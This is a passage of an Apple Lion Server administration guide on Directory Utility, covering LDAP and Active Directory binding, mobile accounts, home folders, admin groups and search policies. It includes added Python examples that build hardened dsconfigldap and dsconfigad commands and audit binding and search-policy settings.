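def ldap_capabilities(rootdse_attrs):
    """Which of the four Directory Utility options this server can support."""
    mechs = set(m.upper() for m in rootdse_attrs.get("supportedSASLMechanisms", []))
    exts = set(rootdse_attrs.get("supportedExtension", []))
    kerberos = "GSSAPI" in mechs
    # Start TLS being advertised shows TLS is configured; whether ldaps on
    # port 636 (what "Encrypt using SSL" uses) is open still has to be checked.
    tls = STARTTLS_OID in exts
    return {
        "disable_clear_text": bool(mechs & NON_CLEARTEXT_MECHS),
        "sign_packets": kerberos,           # requires Kerberos
        "encrypt_packets": kerberos or tls,  # requires SSL or Kerberos
        "block_mitm": kerberos,             # requires Kerberos
        "tls": tls,
        "sasl_mechanisms": sorted(mechs),
    }


def strict_dsconfigldap(server, config_name, caps):
    """argv for dsconfigldap requesting every protection the server offers.

    Assumed flags: -x use SSL, -s enforce secure authentication (no clear
    text), -g packet signing, -m man-in-the-middle protection, -e packet
    encryption, -v verbose, -a add server, -n configuration name.
    """
    argv = ["dsconfigldap", "-v"]
    if caps["tls"]:
        argv.append("-x")
    if caps["disable_clear_text"]:
        argv.append("-s")
    if caps["sign_packets"]:
        argv.append("-g")
    if caps["block_mitm"]:
        argv.append("-m")
    if caps["encrypt_packets"]:
        argv.append("-e")
    return argv + ["-a", server, "-n", config_name]


# Constructed sample: what a Kerberized Open Directory master typically advertises.
SAMPLE_ROOTDSE = """\
dn:
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: CRAM-MD5
supportedSASLMechanisms: DIGEST-MD5
supportedExtension: 1.3.6.1.4.1.1466.20037
supportedExtension: 1.3.6.1.4.1.4203.1.11.1
"""

if __name__ == "__main__":
    caps = ldap_capabilities(parse_ldif_attrs(SAMPLE_ROOTDSE))
    for key in sorted(caps):
        print("%-20s %s" % (key, caps[key]))
    print(" ".join(strict_dsconfigldap("ldap.example.com", "Example LDAP", caps)))
```

Pipe real `ldapsearch` output into `parse_ldif_attrs` instead of the sample to check a live server. A server that advertises only PLAIN or LOGIN gets no `-s`, which is exactly the case where Directory Utility greys out Disable clear text passwords and the password would travel unprotected unless SSL is in place.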

Lion Server user management

Directory Utility

LDAP directories

Enable LDAP bind authentication for a user


You can enable the use of LDAP bind authentication for a user account stored in an LDAP directory domain. When you use this password validation technique, you rely on the LDAP server that contains the user account to authenticate the user's password: the password itself is sent to the LDAP server in a bind operation, so the connection carrying it must be protected. Important: If your computer name contains a hyphen, you might not be able to join or bind to a directory domain such as LDAP or Active Directory. To establish binding, use a computer name that does not contain a hyphen.

1. Make sure the Mac computer that needs to authenticate the user account has a connection to the LDAP directory where the user account resides and that the computer's search policy includes the LDAP directory connection. For information about configuring LDAP server connections and the search policy, see Configure access to an LDAP directory. If you configure an LDAP connection that doesn't map the password and authentication authority attributes, bind authentication occurs automatically. For more information, see Configure LDAP Searches & Mappings.
2. If you configure the connection to permit clear-text passwords, also configure it to use SSL to protect the clear-text password while it is in transit. For more information, see Change the security policy for an LDAP connection and Change the connection settings for an LDAP or Open Directory server.

Lion Server user management

Directory Utility

Active Directory

About Active Directory access


You can configure a Mac to access basic user account information in an Active Directory domain of a Windows 2000 or later server. This is possible because of an Active Directory connector for Directory Utility. This Active Directory connector is listed in the Services pane of Directory Utility. You do not need to make schema changes to the Active Directory domain to get basic user account information. You might want to change the default access control list (ACL) of specific attributes so computer accounts can read user properties.

The Active Directory connector generates all attributes required for Mac OS X authentication from standard attributes in Active Directory user accounts. The connector also supports Active Directory authentication policies, including password changes, expirations, forced changes, and security options.

Mac OS X supports packet encryption and packet-signing options for all Windows Active Directory domains. Both options default to allow, which means the connector uses signing or encryption when the domain controller offers it. You can change the setting to disabled or required by using the dsconfigad command-line tool. Requiring packet encryption and packet signing ensures that all record-lookup data to and from the Active Directory domain is protected; with the default of allow, a domain controller that does not offer them is still accepted over an unprotected channel.

The Active Directory connector dynamically generates a unique user ID and a primary group ID based on the user account's Globally Unique ID (GUID) in the Active Directory domain. The generated user ID and primary group ID are the same for each user account, even if the account is used to log in to different Mac computers. Alternatively, you can force the Active Directory connector to map the user ID to Active Directory attributes that you specify. The Active Directory connector generates a group ID based on the Active Directory group account's GUID. You can also force the connector to map the group ID for group accounts to Active Directory attributes that you specify.

When someone logs in to a Mac using an Active Directory user account, the Active Directory connector can mount the Windows network home folder specified in the Active Directory user account as the user's home folder. You can specify whether to use the network home specified by Active Directory's standard homeDirectory attribute or by the Mac OS X homeDirectory attribute (if the Active Directory schema is extended to include it). Alternatively, you can configure the connector to create a local home folder on the startup volume of the Mac client computer. In this case, the connector also mounts the user's Windows network home folder (specified in the Active Directory user account) as a network volume, like a share point. Using the Finder, the user can then copy files between the Windows home folder network volume and the local Mac home folder.

The Active Directory connector can also create mobile accounts for users. A mobile account has a local home folder on the startup volume of the Mac client computer. (The user also has a network home folder as specified in the user's Active Directory account.) A mobile account caches the user's Active Directory authentication credentials on the Mac client computer. The cached credentials permit the user to log in using the Active Directory name and password when the client computer is disconnected from the Active Directory server.

If the Active Directory schema is extended to include Mac OS X record types (object classes) and attributes, the Active Directory connector detects and accesses them. For example, the Active Directory schema could be changed using Windows administration tools to include Mac OS X managed client attributes. This schema change enables the Active Directory connector to support managed client settings made using the Server app. Mac clients assume full read access to attributes that are added to the directory. Therefore, it might be necessary to change the ACL of those attributes to permit computer groups to read them.

The Active Directory connector discovers all domains in an Active Directory forest. You can configure the connector to permit users from any domain in the forest to authenticate on a Mac computer. Alternatively, you can permit only specific domains to authenticate on the client.

The Active Directory connector fully supports Active Directory replication and failover. It discovers multiple domain controllers and determines the closest one. If a domain controller becomes unavailable, the connector falls back to another nearby domain controller.

The Active Directory connector uses LDAP to access Active Directory user accounts and Kerberos to authenticate them. It does not use Microsoft's proprietary Active Directory Service Interfaces (ADSI) to get directory or authentication services.

Lion Server user management

Directory Utility

Active Directory

Configure access to an Active Directory domain


Using the Active Directory connector listed in Directory Utility, you can configure a Mac to access basic user account information in an Active Directory domain on a Windows server. The Active Directory connector generates all attributes required for Mac OS X authentication. No changes to the Active Directory schema are required. The Active Directory connector detects and accesses standard Mac OS X record types and attributes (such as the attributes required for Mac OS X client management) if the Active Directory schema is extended to include them. WARNING: With the advanced options of the Active Directory connector, you can map the Mac OS X unique user ID (UID), primary group ID (GID), and group GID to attributes that have been added to the Active Directory schema. However, if you change the setting of these mapping options later, users might lose access to previously created files. Important: If your computer name contains a hyphen, you might not be able to join or bind to a directory domain such as LDAP or Active Directory. To establish binding, use a computer name that does not contain a hyphen.

1. Open System Preferences on your computer and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Join or Edit.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Services.
7. In the list of services, select Active Directory and click the Edit button (/).
8. Enter the DNS host name of the Active Directory domain you want to bind to the computer you're configuring. The administrator of the Active Directory domain can tell you the DNS host name to enter.
9. If necessary, edit the Computer ID. The Computer ID is the name the computer is known by in the Active Directory domain, and it's preset to the name of the computer. You might change this to conform to your organization's established scheme for naming computers in the Active Directory domain. If you're not sure, ask the Active Directory domain administrator.
10. (Optional) Set advanced options. If the advanced options are hidden, click Show Advanced Options and set options in the User Experience, Mappings, and Administrative panes. You can also change advanced option settings later.
11. Click Bind, use the following to authenticate as a user who has rights to bind a computer to the Active Directory domain, select the search policies you want Active Directory added to (see below), and click OK:
Username and Password: You might be able to authenticate by entering the name and password of your Active Directory user account, or the Active Directory domain administrator might need to provide a name and password.
Computer OU: Enter the organizational unit (OU) for the computer you're configuring.
Use for authentication: Use to determine whether Active Directory is added to the computer's authentication search policy.
Use for contacts: Use to determine whether Active Directory is added to the computer's contacts search policy.
When you click OK, Directory Utility sets up trusted binding between the computer you're configuring and the Active Directory server. The computer's search policies are set according to the options you selected when you authenticated, and Active Directory is enabled in Directory Utility's Services pane. With the default settings for Active Directory advanced options, the Active Directory forest is added to the computer's authentication search policy and contacts search policy if you selected Use for authentication or Use for contacts. However, if you deselect Allow authentication from any domain in the forest in the Administrative advanced options pane before clicking Bind, the nearest Active Directory domain is added instead of the forest. You can change search policies later by adding or removing the Active Directory forest or individual domains. For more information, see Define search policies.
12. (Optional) Join the server to the Active Directory Kerberos realm:
a. On the server or an administrator computer that can connect to the server, open Server Admin and select Open Directory for the server.
b. Click Settings, then click General.
c. Click Join Kerberos, then choose the Active Directory Kerberos realm from the pop-up menu and enter credentials for a local administrator on this server. For more information, see Join a server to a Kerberos realm.
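The binding above, together with the advanced options that the following sections set in Directory Utility (mobile accounts, home folders, preferred server, administrator groups, unbinding), can be scripted with the dsconfigad tool this guide mentions. The script below is an added example, not code from Apple or from this guide: it builds the dsconfigad command line with packet signing and encryption set to require rather than the default allow, and parses `dsconfigad -show` output to audit an existing binding. The dsconfigad flag names are taken from dsconfigad(8) on Lion and should be checked against your installed version; the domain, computer name, OU, group names and the sample -show output are constructed.

```python
"""Bind a Mac to Active Directory with dsconfigad and audit the result.

Added example, not Apple's code and not from this guide. Flag names follow
dsconfigad(8) on Lion; check them against the installed version. The domain,
OU, computer name, group names and SAMPLE_SHOW are constructed.
"""
import os
import subprocess

DSCONFIGAD = "/usr/sbin/dsconfigad"


def build_bind_command(domain, computer_id, username, ou=None,
                       preferred_dc=None, admin_groups=None, mobile=False,
                       local_home=False, protocol="smb", all_domains=True):
    """argv for a bind. No -password is passed so dsconfigad prompts for it,
    keeping the secret out of `ps` output and shell history. Packet signing
    and encryption are set to require (default is allow), so an unsigned or
    unencrypted channel to a domain controller is refused."""
    if mobile and local_home:
        # Directory Utility greys out "Force local home" once mobile accounts
        # are enabled; mirror that rather than sending both.
        raise ValueError("mobile accounts and forced local home are exclusive")
    if "-" in computer_id:
        raise ValueError("the guide warns that hyphenated names may fail to bind")
    argv = [DSCONFIGAD, "-add", domain, "-computer", computer_id,
            "-username", username,
            "-packetsign", "require", "-packetencrypt", "require",
            "-alldomains", "enable" if all_domains else "disable",
            "-mobile", "enable" if mobile else "disable",
            "-localhome", "enable" if local_home else "disable",
            "-useuncpath", "enable", "-protocol", protocol]
    if ou:
        argv += ["-ou", ou]
    if preferred_dc:
        argv += ["-preferred", preferred_dc]
    if admin_groups:  # DOMAIN\group entries, comma separated for dsconfigad
        argv += ["-groups", ",".join(admin_groups)]
    return argv


def build_unbind_command(username, force=False):
    """argv to unbind; -force breaks the binding even when the domain
    controller is unreachable and leaves a computer object to clean up."""
    argv = [DSCONFIGAD, "-remove", "-username", username]
    return argv + ["-force"] if force else argv


def parse_dsconfigad_show(text):
    """Parse the '  Setting = value' lines of `dsconfigad -show` into a dict."""
    settings = {}
    for line in text.splitlines():
        if "=" in line:
            key, _, value = line.partition("=")
            settings[key.strip()] = value.strip()
    return settings


REQUIRED = {"Packet signing": ("require",),
            "Packet encryption": ("require", "ssl")}


def audit_binding(settings, expected_admin_groups):
    """Return (setting, value, reason) findings for a parsed -show dump."""
    findings = []
    for key, ok in REQUIRED.items():
        value = settings.get(key, "<missing>")
        if value not in ok:
            findings.append((key, value, "should be one of: " + ", ".join(ok)))
    expected = set(g.lower() for g in expected_admin_groups)
    groups = settings.get("Allowed admin groups", "not set")
    if groups != "not set":
        for group in groups.split(","):
            if group.strip().lower() not in expected:
                findings.append(("Allowed admin groups", group.strip(),
                                 "members become local administrators"))
    if settings.get("Authentication from any domain") == "Enabled":
        findings.append(("Authentication from any domain", "Enabled",
                         "accounts from every domain in the forest can log in"))
    return findings


# Constructed sample of `dsconfigad -show` with the defaults the guide describes.
SAMPLE_SHOW = """\
You are bound to Active Directory:
  Active Directory Forest          = example.com
  Active Directory Domain          = example.com
  Computer Account                 = maclab01$

Advanced Options - Administrative
  Preferred Domain controller      = not set
  Allowed admin groups             = EXAMPLE\\domain admins,EXAMPLE\\helpdesk
  Authentication from any domain   = Enabled
  Packet signing                   = allow
  Packet encryption                = allow
  Password change interval         = 14
"""


def current_settings():
    """Live binding when dsconfigad exists (a Mac), else the constructed sample."""
    if os.path.exists(DSCONFIGAD):
        out = subprocess.check_output([DSCONFIGAD, "-show"])
        return parse_dsconfigad_show(out.decode("utf-8", "replace"))
    return parse_dsconfigad_show(SAMPLE_SHOW)


if __name__ == "__main__":
    print(" ".join(build_bind_command("example.com", "maclab01", "adjoin",
                                      ou="OU=Macs,DC=example,DC=com",
                                      admin_groups=["EXAMPLE\\Mac Admins"])))
    for key, value, reason in audit_binding(current_settings(),
                                            ["EXAMPLE\\domain admins"]):
        print("%s = %s: %s" % (key, value, reason))
```

Run it with the Mac's bundled python as root on a bound client to audit that client; on any other machine it audits the constructed sample, which reports the two allow settings, the unexpected helpdesk group and forest-wide authentication. Tightening signing and encryption on an existing binding is `dsconfigad -packetsign require -packetencrypt require`; confirm afterwards with `dsconfigad -show`.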

Lion Server user management

Directory Utility

Active Directory

Set up mobile user accounts in Active Directory


You can enable or disable mobile Active Directory user accounts on a computer that is configured to use Directory Utility's Active Directory connector. Users with mobile accounts can log in using their Active Directory credentials when the computer is not connected to the Active Directory server. The Active Directory connector caches credentials for a user's mobile account when the user logs in while the computer is connected to the Active Directory domain. This credential caching does not require changing the Active Directory schema. If the Active Directory schema is extended to include Mac OS X Lion managed client attributes, those mobile account settings are used instead of the Active Directory connector mobile account setting. You can have mobile accounts created automatically or you can require that Active Directory users confirm creation of a mobile account.

1. Open System Preferences on your computer and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Join or Edit.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Services.
7. In the list of services, select Active Directory and click the Edit button (/).
8. If the advanced options are hidden, click Show Advanced Options.
9. Click User Experience, then click Create mobile account at login, and optionally click Require confirmation before creating a mobile account. Note the following:
If both options are selected, each user decides whether to create a mobile account during login. When a user logs in to Mac OS X using an Active Directory user account, or when logging in as a network user, the user sees a dialog with controls for creating a mobile account immediately.
If the first option is selected and the second option is unselected, mobile accounts are created when users log in.
If the first option is not selected, the second option is disabled.
10. Click OK.

Lion Server user management

Directory Utility

Active Directory

Set up home folders for Active Directory user accounts


On a computer that's configured to use the Directory Utility Active Directory connector, you can enable or disable network home folders or local home folders for Active Directory user accounts. With network home folders, a user's Windows network home folder is mounted as the Mac OS X home folder when the user logs in. You determine whether the network home folder location is obtained from the Active Directory standard homeDirectory attribute or from the Mac OS X homeDirectory attribute, if the Active Directory schema is extended to include it. With local home folders, each Active Directory user who logs in has a home folder on the Mac OS X startup disk. In addition, the user's network home folder is mounted as a network volume, like a share point. The user can copy files between this network volume and the local home folder.

1. Open System Preferences on your computer and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Join or Edit.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Services.
7. In the list of services, select Active Directory and click the Edit button (/).
8. If the advanced options are hidden, click Show Advanced Options.
9. Click User Experience.
10. If you want Active Directory user accounts to have local home folders in the computer's /Users folder, click Force local home folder on startup disk. This option is not available if Create mobile account at login is selected.
11. To use the Active Directory standard attribute for the home folder location, select Use UNC path from Active Directory to derive network home location and then choose from the following protocols for accessing the home folder:
To use the standard Windows protocol SMB, choose smb from the Network protocol to be used pop-up menu.
To use the standard Macintosh protocol AFP, choose afp from the Network protocol to be used pop-up menu.
12. To use the Mac OS X attribute for the home folder location, deselect Use UNC path from Active Directory to derive network home location. To use the Mac OS X attribute, the Active Directory schema must be extended to include it.
13. Click OK.

If you change the name of a user account in the Active Directory domain, the server creates a home folder (and subfolders) for the user account the next time it is used for logging in to a Mac OS X computer. The user can still navigate to the old home folder and see its contents in the Finder. You can prevent creation of a home folder by renaming the old folder before the user next logs in.

Lion Server user management

Directory Utility

Active Directory

Specify a preferred Active Directory server


On a computer that's configured to use Directory Utility's Active Directory connector, you can specify the DNS host name of the domain controller you want the computer to contact by default. If that server becomes unavailable, the Active Directory connector falls back to another nearby domain controller in the forest. If this option is deselected, the Active Directory connector determines the closest domain controller itself.

1. Open System Preferences on your computer and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Edit.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Services.
7. In the list of services, select Active Directory and click the Edit button (/).
8. If the advanced options are hidden, click Show Advanced Options.
9. Click Administrative.
10. Select Prefer this domain server and enter the DNS host name of the Active Directory server.
11. Click OK.

Lion Server user management

Directory Utility

Active Directory

Change the Active Directory groups that can administer the computer
On a computer that's configured to use Directory Utility's Active Directory connector, you can identify Active Directory group accounts whose members you want to have administrator privileges for the computer. Users who are members of these Active Directory group accounts can perform administrative tasks, such as installing software, on the Mac computer you are configuring. Keep this list short and review it when group memberships in Active Directory change, because anyone added to a listed group on the domain side becomes a local administrator of every Mac that lists it.

1. Open System Preferences on your computer and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Edit.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Services.
7. In the list of services, select Active Directory and click the Edit button (/).
8. If the advanced options are hidden, click Show Advanced Options.
9. Click Administrative.
10. Select Allow administration by and change the list of Active Directory group accounts whose members you want to have administrator privileges:
Add a group by clicking the Add button (+) and entering the Active Directory domain name, a backslash, and the group account name (for example, ADS\Domain Admins, IL2\Domain Admins).
Delete a group by selecting it in the list and then clicking the Delete button (-).
11. Click OK.

Lion Server user management

Directory Utility

Active Directory

Unbind from an Active Directory Server


If the computer is using Directory Utility's Active Directory connector to bind to an Active Directory server, you can unbind the computer from the Active Directory server. You can forcibly unbind if the computer can't contact the server or if the computer record has been removed from the server.

1. Open System Preferences on your computer and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Edit.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Services.
7. In the list of services, select Active Directory and click the Edit button (/).
8. Click Unbind, authenticate as a user who has rights to terminate a connection to the Active Directory domain, and click OK. If you see an alert saying the credentials weren't accepted or the computer can't contact Active Directory, click Force Unbind to forcibly break the connection. If you forcibly unbind, Active Directory still contains a computer record for this computer. Notify the Active Directory administrator so the administrator knows to remove the computer record.

Lion Server user management

Directory Utility

Service access

Enable or disable Active Directory service


You can use Directory Utility to enable or disable the use of Active Directory services provided by a Windows server. Active Directory is the directory service of Windows 2000 and later servers. If you disable Active Directory services and Active Directory domains are part of a custom search policy, they are listed in red in the Authentication or Contacts pane of Search Policy in Directory Utility.

1. Open System Preferences on your computer and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer has at least one connection to a directory server.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Services.
7. In the list of services, select or deselect the Enable checkbox next to Active Directory.
8. Click Apply.

Lion Server user management

Directory Utility

Service access

Enable or disable LDAP directory services


You can use Directory Utility to enable or disable access to directory services that use LDAPv2 and LDAPv3. A single Directory Utility plug-in named LDAPv3 provides access to both LDAPv2 and LDAPv3. The directory services provided by a Mac server use LDAPv3, as do many other servers. LDAPv3 is an open standard common in mixed networks of Macintosh, UNIX, and Windows systems. Some servers use the older version, LDAPv2, to provide directory service. If you disable LDAP directory services and LDAP directories are part of a custom search policy, they are listed in red in the Authentication or Contacts pane of Search Policy in Directory Utility.

1. Open System Preferences on your computer and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer has at least one connection to a directory server.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Services.
7. In the list of services, select or deselect the Enable checkbox next to LDAPv3.
8. Click Apply.

Lion Server user management

Directory Utility

Search policies

Advanced search policy settings


Each Mac computer has a search policy, also commonly referred to as a search path, that specifies which directory domains Open Directory can access, such as the computer's local directory domain and a shared directory. The search policy also specifies the order in which Open Directory accesses directory domains. Open Directory searches each directory domain in turn and stops searching when it finds a match. For example, Open Directory stops searching for a user record when it finds a record whose user name matches the name it's looking for. Because the first match wins, the order of the list decides which directory's account is used when two directories contain the same user name.

Directory Utility defines the following search policies:

Authentication: Mac OS X uses the authentication search policy to locate and retrieve user authentication information and other administrative data from directory domains.

Contacts: Mac OS X uses the contacts search policy to locate and retrieve name, address, and other contact information from directory domains. The Address Book application on your Mac computer uses this contact information. Other applications can also be programmed to use it.

Each search policy consists of a list of directory domains. The order of directory domains in the list defines the search policy. Starting at the top of the list, Mac OS X searches each listed directory domain until it finds the information it needs or reaches the end of the list without finding the information.

The authentication and contacts search policies can have one of the following settings:

Automatic: Starts with the local directory domain and includes LDAP directory domains that the computer is connected to.

Local directory: Includes only the local directory domain.

Custom path: Starts with the local directory domain and includes your choice of LDAP directories, an Active Directory domain, shared directory domains, BSD configuration files, and an NIS domain.

The /BSD/local folder is always included in the search path, and is always grayed out.

Lion Server user management

Directory Utility

Search policies

Define search policies


You can define search policies for the directory servers you are connected to. You can define automatic, custom, and local directory search policies.

Define automatic search policies

Using Directory Utility, you can configure a Mac computer's authentication and contacts search policies to be defined automatically. An automatically defined search policy includes the local directory domain. It can also include an LDAP directory server specified by the DHCP service. This is the default configuration for the authentication and contacts search policies.

Note: Some applications, such as Mail and Address Book, can access LDAP directories directly, without using Open Directory. To set up one of these applications to access LDAP directories directly, open the application and set the correct preference.

After changing the search policy in the Authentication pane or the Contacts pane of Directory Utility, wait 10 or 15 seconds for the change to take effect. Attempts to log in using an account from a directory domain that uses the authentication search policy are unsuccessful until changes to it take effect.

1. Open System Preferences on your computer and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer has at least one connection to a directory server.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Search Policy and choose a search policy:
Authentication: Shows the search policy used for authentication and most other administrative data.
Contacts: Shows the search policy used for contact information in applications such as Address Book.
7. From the Search pop-up menu, choose Automatic, then click Apply.
8. In System Preferences, make sure the computer's Network preferences are configured to use DHCP or DHCP with a manual IP address.

Define custom search policies

Using Directory Utility, you can configure a Mac computer's authentication and contacts search policies to use a custom list of directory domains. A custom list starts with the computer's local directory domain and can include Open Directory (and other LDAP directory domains), an Active Directory domain, shared directory domains, BSD configuration files, and an NIS domain. If a directory domain specified on a computer's custom search policy is not available, a delay occurs when the computer starts up.

After changing the search policy in the Authentication pane or the Contacts pane of Directory Utility, wait 10 or 15 seconds for the change to take effect. Attempts to log in using an account from a directory domain that uses the authentication search policy are unsuccessful until changes to it take effect.

1. Open System Preferences on your computer and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer has at least one connection to a directory server.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Search Policy and choose a search policy:
Authentication: Shows the search policy used for authentication and most other administrative data.
Contacts: Shows the search policy used for contact information in applications such as Address Book.
7. From the Search pop-up menu, choose Custom path.
8. Add directory domains as needed by clicking Add, selecting directories, and clicking Add again.
9. Change the order of the listed directory domains as needed by dragging them up or down the list.
10. Remove listed directory domains that you don't want in the search policy by selecting them and clicking the Delete button (-).
11. Confirm the removal by clicking OK, then click Apply.

Define local directory search policies

Using Directory Utility, you can configure a Mac computer's authentication and contacts search policies to use only the computer's local directory. A search policy that uses only the local directory limits the access a computer has to authentication information and other administrative data. If you restrict a computer's authentication search policy to use only the local directory, only users with local accounts can log in.

After changing the search policy in the Authentication pane or the Contacts pane of Directory Utility, wait 10 or 15 seconds for the change to take effect. Attempts to log in using an account from a directory domain that uses the authentication search policy are unsuccessful until changes to it take effect.

1. Open System Preferences on your computer and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer has at least one connection to a directory server.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Search Policy and choose a search policy:
Authentication: Shows the search policy used for authentication and most other administrative data.
Contacts: Shows the search policy used for contact information in applications such as Address Book.
7. From the Search pop-up menu, choose Local directory, then click Apply.
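The three procedures above set the policy through Directory Utility; the following added example (not from this guide or from Apple) audits what a Mac actually ended up with, based on the attributes that `dscl /Search -read /` prints. SearchPolicy names the active policy (NSPSearchPath for Automatic, LSPSearchPath for Local directory, CSPSearchPath for Custom path) and the attribute of that name lists the nodes in search order. The script reports which policy is active, flags any consulted node that is not on an explicit allowlist, warns when an automatic policy can accept an LDAP server handed out by DHCP (the rogue-server case the LDAPv3 security policy section guards against), and builds the dscl commands that pin a custom path. The dscl output layout, the DHCPLDAPDefault key and the dscl command forms are assumptions from dscl(1) on Lion; the sample output is constructed.

```python
"""Audit a Mac's Open Directory search policy from `dscl /Search -read /` output.

Added example, not part of this guide or of Apple's tools. The dscl output
layout, the DHCPLDAPDefault key and the commands in custom_path_commands()
are assumptions from dscl(1) on Lion. SAMPLE_DSCL is constructed.
"""
import re

POLICY_NAMES = {
    "dsAttrTypeStandard:NSPSearchPath": "Automatic",
    "dsAttrTypeStandard:LSPSearchPath": "Local directory",
    "dsAttrTypeStandard:CSPSearchPath": "Custom path",
}
LOCAL_NODE = "/Local/Default"


def parse_dscl_read(text):
    """Parse dscl -read output into {key: [values]}.

    Single values appear as 'Key: value'; multi-valued attributes appear as
    'Key:' followed by one value per line, each indented by a space.
    """
    attrs, current = {}, None
    for line in text.splitlines():
        if line.startswith(" ") and current is not None:
            attrs[current].append(line.strip())
            continue
        m = re.match(r"^([^:\s]+):\s*(.*)$", line)
        if not m:
            continue
        current = m.group(1)
        attrs.setdefault(current, [])
        if m.group(2):
            attrs[current].append(m.group(2))
    return attrs


def effective_search_path(attrs):
    """Return (policy name, ordered node list) for the active policy."""
    policy = attrs.get("SearchPolicy", [""])[0]
    name = POLICY_NAMES.get(policy, "Unknown")
    key = policy.split(":")[-1] if ":" in policy else ""
    return name, list(attrs.get(key, []))


def audit_search_path(attrs, allowed_nodes):
    """Findings: wrong ordering, nodes outside the allowlist, DHCP-fed LDAP."""
    name, nodes = effective_search_path(attrs)
    findings = []
    if nodes and nodes[0] != LOCAL_NODE:
        findings.append("local node is not searched first: %s" % nodes[0])
    for node in nodes:
        if node != LOCAL_NODE and node not in allowed_nodes:
            findings.append("unexpected node in %s policy: %s" % (name, node))
    dhcp = attrs.get("DHCPLDAPDefault", ["off"])[0].lower()
    if name == "Automatic" and dhcp != "off":
        findings.append("Automatic policy accepts an LDAP server supplied by DHCP")
    return findings


def custom_path_commands(nodes):
    """dscl argv list that pins the authentication policy to LOCAL_NODE + nodes.

    -create replaces the attribute with a single value; -append adds the rest
    in order, which is what defines the search precedence.
    """
    cmds = [["dscl", "/Search", "-create", "/", "SearchPolicy", "CSPSearchPath"],
            ["dscl", "/Search", "-create", "/", "CSPSearchPath", LOCAL_NODE]]
    for node in nodes:
        cmds.append(["dscl", "/Search", "-append", "/", "CSPSearchPath", node])
    return cmds


# Constructed sample: automatic policy on a client that also took an LDAP
# server from DHCP (192.0.2.55) alongside the intended Open Directory master.
SAMPLE_DSCL = """\
AppleMetaNodeLocation: /Search
CSPSearchPath:
 /Local/Default
 /LDAPv3/ldap.example.com
 /Active Directory/EXAMPLE/All Domains
DHCPLDAPDefault: on
LSPSearchPath: /Local/Default
NSPSearchPath:
 /Local/Default
 /LDAPv3/ldap.example.com
 /LDAPv3/192.0.2.55
SearchPolicy: dsAttrTypeStandard:NSPSearchPath
"""

ALLOWED = set(["/LDAPv3/ldap.example.com", "/Active Directory/EXAMPLE/All Domains"])

if __name__ == "__main__":
    attrs = parse_dscl_read(SAMPLE_DSCL)
    name, nodes = effective_search_path(attrs)
    print("policy: %s, nodes: %s" % (name, " > ".join(nodes)))
    for finding in audit_search_path(attrs, ALLOWED):
        print("finding: " + finding)
    for cmd in custom_path_commands(sorted(ALLOWED)):
        print(" ".join(cmd))
```

On a Mac, feed the script the real output (`dscl /Search -read / | python audit.py` style, or `subprocess`) instead of the sample. As the guide says, allow 10 to 15 seconds after changing the policy before testing a network login.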

Lion Server user management

Directory Utility

Records and attributes

Add or delete records


You can use the Directory Editor in Directory Utility to add or delete records. WARNING: Deleting records can cause the server to behave erratically or stop working. Don't delete records unless you know they're not needed for proper server functioning. WARNING: After using the Directory Editor to delete user or computer records, use command-line tools to delete the corresponding Kerberos identity and Password Server slot. If you leave an orphaned Kerberos identity or Password Server slot, it can conflict with a user or computer record created later.

1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Edit.

4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Directory Editor. 7. From the Viewing pop-up menu, choose the record type to modify. 8. From the in-node pop-up menu, choose the directory domain or local directory to modify, and authenticate as an administrator of the domain or local directory. To authenticate, click the Lock button next to the directory that you chose. 9. To add a record, click the Add button (+) (below the list of records) and enter a name for the record in the value pane. Depending on the record you add, you might need to make changes to the attribute values of the record. 10. To delete a record, s elect the record to delete, then click the Delete (-) button (below the list of records ). You cannot revert the deleting of a record. If you are sure this is the record you want to delete, click Delete. 11. Click Save.

Lion Server user management

Directory Utility

Records and attributes

Add or delete record attributes


You can use the Directory Editor in Directory Utility to add or delete record attributes.

